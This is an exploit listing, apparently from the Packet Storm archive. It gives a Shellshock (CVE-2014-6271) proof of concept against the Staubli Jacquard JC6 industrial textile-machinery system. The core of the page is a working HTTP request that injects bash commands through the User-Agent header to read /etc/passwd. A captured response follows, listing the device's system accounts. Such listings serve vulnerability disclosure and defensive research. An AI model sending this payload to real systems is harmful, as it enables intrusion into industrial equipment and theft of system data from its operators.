exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Staubli Jacquard Industrial System JC6 Shellshock

Staubli Jacquard Industrial System JC6 Shellshock
Posted Sep 21, 2018
Authored by t4rkd3vilz

Staubli Jacquard Industrial System JC6 suffers from a bash environment variable handling code injection vulnerability.

tags | exploit, bash
advisories | CVE-2014-6271
SHA-256 | 298aac6aa0537ef624d332e5623f63e990ee12f9376d9baef4524a5f870ca6cb

Staubli Jacquard Industrial System JC6 Shellshock

Change Mirror Download
# Exploit Title: Staubli Jacquard Industrial System | GNU Bash Environment
Variable Handling Code Injection (Shellshock)
# Date: 21.09.2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.staubli.com
# Software Link:
https://www.staubli.com/tr-tr/textile/textile-machinery-solutions/
# Version:JC6
# CVE: CVE-2014-6271
# Tested on: Linux

----------------------------#PoC#----------------------------

--------------> Request

GET / HTTP/1.1 Host: TargetIP User-Agent: () { test;};echo \"Content-type:
text/plain\"; echo; echo; echo $(</etc/passwd) Pragma: no-cache Accept:
image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

--------------> Response

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf8">
<link href="/staubli.css" rel="stylesheet" type="text/css">
<title>root:!:0:0::/:/usr/bin/ksh daemon:!:1:1::/etc: bin:!:2:2::/bin:
sys:!:3:3::/usr/sys: adm:!:4:4::/var/adm: uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest: nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/: lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh nuucp:*:6:5:uucp login
user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
paul:!:201:1::/home/paul:/usr/bin/ksh jdoe:*:202:1:John
Doe:/home/jdoe:/usr/bin/ksh</title>
</head>
<frameset rows="10%,90%" border=0>
<frameset cols="25%,75%" border=0>
<frame src="logo.html" name="logo" scrolling="no">
<frame src="/cgi-bin/title.cgi" name="title">
</frameset>
<frameset cols="25%,75%" border=0>
<frame src="menu_main.shtml" name="menu">
<frame src="main.shtml" name="main">
</frameset>
</frameset>
<noframe>
<body id="main">
Sorry your navigator doesn't accept frame.
</body>
</noframe>
</html>
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close